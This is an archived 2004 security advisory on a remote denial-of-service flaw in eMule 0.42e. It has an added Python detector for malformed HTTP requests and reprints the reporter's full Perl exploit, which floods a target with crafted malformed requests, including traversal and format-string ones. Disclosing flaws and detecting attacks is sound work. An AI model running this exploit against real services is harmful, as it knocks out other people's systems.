SecurityTracker.com
SecurityTracker
Archives


Category:  Application (File Transfer/Sharing)  >  eMule
Vendors:  Emule-Project.net
eMule Service Can Be Crashed By Remote Users Sending a Variety of Malformed Requests
SecurityTracker Alert ID:  1010108
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  May 10 2004
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): 0.42e
Description:  Rafel Ivgi (The-Insider) reported a denial of service vulnerability in eMule. A remote user can crash the service.

It is reported that a remote user can send a series of specially crafted requests to cause the eMule service to crash. The requests include a negative Content-Length POST request, GET requests with many characters and/or without the HTTP version specifier, a GET request with format string characters, a GET request with a filename with directory traversal characters, and others.

A demonstration exploit script is provided in the Source Message.

Impact:  A remote user can cause the target service to crash.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.emule-project.net/
Cause:  Exception handling error
Underlying OS:  Windows (Any)
Reported By:  Rafel Ivgi, The-Insider <theinsider@012.net.il>
Message History:   None.
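
The request classes listed in the Description can be checked before a request reaches the HTTP parser, or afterwards over captured traffic. The following is an added example, not part of the advisory or of the reporter's script; the 1024-byte target limit, the label names and the sample requests are assumptions constructed for illustration.

```python
import re

MAX_TARGET = 1024  # assumed limit for this example; tune to the server
REQUEST_LINE = re.compile(r"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]$")
BAD_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")  # '%' not followed by two hex digits
TRAVERSAL = re.compile(r'filename="?[^";]*\.\.[/\\]')
DIGITS = re.compile(r"[0-9]+")


def classify(raw: bytes) -> list:
    """Return anomaly labels for one raw request head; an empty list means clean."""
    text = raw.decode("latin-1").replace("\r\n", "\n")
    lines = text.split("\n\n", 1)[0].split("\n")
    findings = []
    # Request line must be: METHOD SP target SP HTTP/1.x
    if REQUEST_LINE.match(lines[0]) is None:
        findings.append("malformed-request-line")
    parts = lines[0].split(" ")
    target = parts[1] if len(parts) > 1 else ""
    if len(target) > MAX_TARGET:
        findings.append("overlong-target")
    if BAD_ESCAPE.search(target):
        findings.append("bad-percent-escape")

    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "content-length":
            if DIGITS.fullmatch(value.strip()) is None:
                findings.append("bad-content-length")
        # Searched per line so a folded "filename=" continuation is still seen.
        if TRAVERSAL.search(line):
            findings.append("traversal-in-filename")
    return findings


# Constructed sample requests, one per class named in the Description.
SAMPLES = {
    "clean": b"GET /index.htm HTTP/1.1\r\nHost: example.test\r\n\r\n",
    "negative-length": b"POST / HTTP/1.1\r\nContent-Length: -1\r\n\r\n",
    "no-version": b"GET /" + b"a" * 2000 + b"\r\n\r\n",
    "percent-run": b"GET /%%%%%%%%%%%% HTTP/1.0\r\n\r\n",
    "traversal": b"GET / HTTP/1.1\r\nContent-Disposition: form-data; "
                 b'name="file"; filename="../../../file.txt"\r\n\r\n',
    "no-method": b"index.htm\r\n\r\n",
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print(f"{label:16} {classify(request) or 'ok'}")
```

A front-end that rejects any request with a non-empty result keeps these inputs away from a parser that does not handle them.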


 Source Message Contents

Date:  Mon, 10 May 2004 19:36:52 +0200
From:  Rafel Ivgi, The-Insider <theinsider@012.net.il>
Subject:  Emule 0.42e Remote Denial Of Service Exploit

 


#!/usr/bin/perl

system("cls");
# Emule 0.42e Remote Denial Of Service Exploit
# Coded by Rafel Ivgi, The-Insider:   http://theinsider.deep-ice.com
# usage: perl emule042e.pl <host> <port> <how many times>

use IO::Socket;
my $host = $ARGV[0];
my $port = $ARGV[1];
my $times = $ARGV[2];

if ($host) {

unless($port) { $port="4711";}
unless($times) { $times="50";}

print "Emule 0.42e Remote Denial Of Service Exploit
            Coded by The-Insider\n\n";
print "[+] Connecting to target $host:$port\n";
for $i (1..$times) {
    $remote=IO::Socket::INET->new(Proto =>"tcp",
                                  PeerAddr => $host,
                                  PeerPort =>  80,
                                  Type => SOCK_STREAM,
                                  Timeout => 8);

    unless ($remote)
    {
        die "can't connect to $host"
    }
    print "[+] Connected to target $host:$port\n";
    print "[+] Sending Request\n";
    $remote ->autoflush(1);
print $remote "GET / HTTP/1.1
Content-Disposition: form-data; name=\"file\";
filename=\"../../../file.txt\"

";
print $remote "POST / HTTP/1.0
Content-Length: 10

123456789

";
print $remote "POST / HTTP/1.1
Content-Length: -1

";
print $remote "GET /%%%%%%%%%%%% HTTP/1.0

";
print $remote "index.htm

";
print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1

";
print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa

";
print $remote "GET c:\

";
                   print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1

";
    while(<$remote>)
    {
        $cool .= $_;
        if ($cool =~ /Server:/i)
        {
            close $cool;
            close $remote;
        }
    }
    print "[+] Target Demolished.\n";
}
}
else {
die "\nEmule 0.42e Remote Denial Of Service Exploit
Coded by Rafel Ivgi, The-Insider:   http://theinsider.deep-ice.com


usage: perl emule042e.pl <host> <port> <how many times>\n\n";
}




 



Copyright 2004, SecurityGlobal.net LLC